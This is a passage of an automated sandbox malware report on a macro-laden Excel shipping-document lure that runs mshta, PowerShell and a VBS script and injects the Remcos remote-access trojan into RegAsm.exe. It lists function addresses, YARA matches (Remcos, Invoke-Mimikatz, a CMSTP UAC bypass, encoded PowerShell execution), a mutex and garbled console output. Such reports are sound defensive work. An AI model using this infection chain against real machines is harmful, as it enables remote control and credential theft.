                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0044B61026_2_0044B610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0044D6C026_2_0044D6C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_004476F026_2_004476F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0044B87026_2_0044B870
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0044081D26_2_0044081D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0041495726_2_00414957
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_004079EE26_2_004079EE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00407AEB26_2_00407AEB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0044AA8026_2_0044AA80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00412AA926_2_00412AA9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00404B7426_2_00404B74
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00404B0326_2_00404B03
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0044BBD826_2_0044BBD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00404BE526_2_00404BE5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00404C7626_2_00404C76
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00415CFE26_2_00415CFE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00416D7226_2_00416D72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00446D3026_2_00446D30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00446D8B26_2_00446D8B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00406E8F26_2_00406E8F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0040503828_2_00405038
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0041208C28_2_0041208C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_004050A928_2_004050A9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0040511A28_2_0040511A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0043C13A28_2_0043C13A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_004051AB28_2_004051AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0044930028_2_00449300
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0040D32228_2_0040D322
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0044A4F028_2_0044A4F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0043A5AB28_2_0043A5AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0041363128_2_00413631
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0044669028_2_00446690
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0044A73028_2_0044A730
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_004398D828_2_004398D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_004498E028_2_004498E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0044A88628_2_0044A886
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0043DA0928_2_0043DA09
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_00438D5E28_2_00438D5E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_00449ED028_2_00449ED0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0041FE8328_2_0041FE83
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_00430F5428_2_00430F54
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 29_2_004050C229_2_004050C2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 29_2_004014AB29_2_004014AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 29_2_0040513329_2_00405133
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 29_2_004051A429_2_004051A4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 29_2_0040124629_2_00401246
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 29_2_0040CA4629_2_0040CA46
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 29_2_0040523529_2_00405235
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 29_2_004032C829_2_004032C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 29_2_0040168929_2_00401689
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 29_2_00402F6029_2_00402F60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0043706A31_2_0043706A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0041400531_2_00414005
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0043E11C31_2_0043E11C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_004541D931_2_004541D9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_004381E831_2_004381E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0041F18B31_2_0041F18B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0044627031_2_00446270
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0043E34B31_2_0043E34B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_004533AB31_2_004533AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0042742E31_2_0042742E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0043756631_2_00437566
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0043E5A831_2_0043E5A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_004387F031_2_004387F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0043797E31_2_0043797E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_004339D731_2_004339D7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0044DA4931_2_0044DA49
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00427AD731_2_00427AD7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0041DBF331_2_0041DBF3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00427C4031_2_00427C40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00437DB331_2_00437DB3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00435EEB31_2_00435EEB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0043DEED31_2_0043DEED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00426E9F31_2_00426E9F
                    Source: Maersk BL, IN & PL.xlsOLE indicator, VBA macros: true
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004169A7 appears 87 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004165FF appears 35 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434801 appears 41 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00422297 appears 42 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434E70 appears 54 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00402093 appears 50 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0044DB70 appears 41 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00401E65 appears 34 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00444B5A appears 37 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00413025 appears 79 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00416760 appears 69 times
                    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                    Source: 31.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 31.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 31.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 31.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 31.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 31.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 14.2.powershell.exe.12b01a28.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 14.2.powershell.exe.12b01a28.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 14.2.powershell.exe.12b01a28.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 14.2.powershell.exe.12b01a28.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 14.2.powershell.exe.12b01a28.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 14.2.powershell.exe.12b01a28.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0000000E.00000002.497783599.000000001291E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0000001F.00000002.526775869.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0000001F.00000002.526775869.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0000001F.00000002.526775869.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: Process Memory Space: powershell.exe PID: 3352, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: powershell.exe PID: 2476, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 2476, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: Process Memory Space: powershell.exe PID: 2476, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: powershell.exe PID: 3932, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: powershell.exe PID: 4040, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: Process Memory Space: powershell.exe PID: 4040, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: RegAsm.exe PID: 3180, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: bhvCD3E.tmp.26.drBinary or memory string: org.slneighbors
                    Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winXLS@41/45@7/6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,26_2_004182CE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 29_2_00410DE1 GetCurrentProcess,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,29_2_00410DE1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,31_2_0041798D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,26_2_00418758
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle,26_2_00413D4C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,26_2_0040B58D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,31_2_0041AADB
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\6E530000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-0BYJUE
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC15B.tmpJump to behavior
                    Source: Maersk BL, IN & PL.xlsOLE indicator, Workbook stream: true
                    Source: 6E530000.0.drOLE indicator, Workbook stream: true
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicefeaturesworkinggreat.vbS"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..!..............P................i.......i.....}..w.............................1......(.P..............3........!.............Prx.............Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.......................J.l....}..w....Prx.....\.......................(.P.....p.......x.......H...............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..!.....................................Prx.....}..w............`7d......K.l....`.c.....(.P.....p.......x.........!.............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.......................J.l....}..w....Prx.....\.......................(.P.....p.......x.......H...............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..!.....................................Prx.....}..w............`7d......K.l....`.c.....(.P.....p.......x.........!.............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.`7d......K.l....`.c.....(.P.....p.......x............... .......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..!.....................................Prx.....}..w............`7d......K.l....`.c.....(.P.....p.......x.........!.............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.p.......x...............@.......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..!.....................................Prx.....}..w............`7d......K.l....`.c.....(.P.....p.......x.........!.............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...........N.......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..!.....................................Prx.....}..w............`7d......K.l....`.c.....(.P.....p.......x.........!.....l.......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......Prx.....}..w............`7d......K.l....`.c.....(.P.....p.......x.......................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Prx.............0........Wh.....}..w....H.......@E......^...............(.P.....p.......x.......................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Prx......................Wh.....}..w....H.......@E......^...............(.P.....p.......x.......................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............T.r.u.e...i.....}..w.............................1......(.P..............3......................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................i.....}..w......i......................1......(.P.....................................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P................i.......i.....}..w.............................1......(.P..............3........................a.............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................d..l....}..w......a.....\.......................(.P.....................................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........................................a.....}..w..............T........l.....w......(.P.....................................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................d..l....}..w......a.....\.......................(.P.....................................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........................................a.....}..w..............T........l.....w......(.P.....................................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1...T........l.....w......(.P............................. .......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........................................a.....}..w..............T........l.....w......(.P.....................................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.........................@.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........................................a.....}..w..............T........l.....w......(.P.....................................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...........N.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........................................a.....}..w..............T........l.....w......(.P.............................l.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .........a.....}..w..............T........l.....w......(.P.....................................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..................a.............0...d....Wh.....}..w............@E......^...............(.P.....................8...............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..................a.................d....Wh.....}..w............@E......^...............(.P.....................8...............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............T.r.u.e...i.....}..w.............................1......(.P..............3......................0...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................i.....}..w......i......................1......(.P.....4...............................................
